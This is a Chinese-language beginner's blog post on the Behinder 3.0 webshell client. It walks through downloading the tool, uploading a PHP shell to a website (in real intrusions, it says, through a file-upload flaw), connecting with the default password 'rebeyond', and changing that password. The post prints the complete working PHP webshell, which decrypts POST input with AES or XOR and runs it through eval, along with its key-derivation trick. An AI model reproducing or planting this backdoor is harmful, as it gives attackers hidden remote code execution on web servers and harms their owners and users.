首页 > 技术文章 > 冰蝎3.0初体验

xcymn 2021-03-01 17:25 原文

这篇文章比较基础,主要面向新手,技术含量较低主要为操作流程。


0x01. 冰蝎是什么

利用动态二进制加密实现新型一句话木马的客户端 , 相对于菜刀和蚁剑他的数据是加密传输的

1.1 下载

github地址: https://github.com/rebeyond/Behinder/releases

下载后的文件

image-20210210102351676

server文件中放的是各种语言的webshell,如下图:

image-20210210102429139

Behinder_v3.0_Beta6_win.jar是客户端 , 双击就能打开 , 但是要有java环境 , 下图是我的java环境

image-20210210102637880

data.db是数据库相关文件 , 最下面更新日志文件

0x02. 连接webshell

2.1 环境准备

这里我就简单演示 , 直接在本机电脑上启动phpstudy

http://192.168.1.106/

image-20210210102942366

手动将php的shell上传到网站上 , 实际渗透过程中是通过文件上传 , 将shell.php上传到对方网站中

http://192.168.1.106/muma/shell.php

image-20210210103155501

2.2 打开客户端连接

双击Behinder_v3.0_Beta6_win.jar , 打开之后就是以下画面

image-20210210103351849

右键 ---> 新增 , 依次输入shell的信息 , 默认密码 : rebeyond

image-20210210103523029

进行连接

image-20210210103641860

连接成功

0x03. 默认密码修改

冰蝎的作者应该很喜欢beyond的歌曲 ( 我猜的 ) , 所以连接shell的默认密码为 rebeyond

打开shell.php , 在源码中可以看到

<?php
@error_reporting(0);
session_start();
        $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond

如果你想修改连接密码只需要替换掉先前md5的前16位 , 比如更改连接密码为admin

image-20210210104125905

$key="21232f297a57a5a7"; //该密钥为连接密码32位md5值的前16位,连接密码admin

然后替换源文件中的这一句代码 , 保存并退出 , 这样以后的shell.php的链接密码为admin

冰蝎客户端的详情介绍 : https://xz.aliyun.com/t/2799

推荐阅读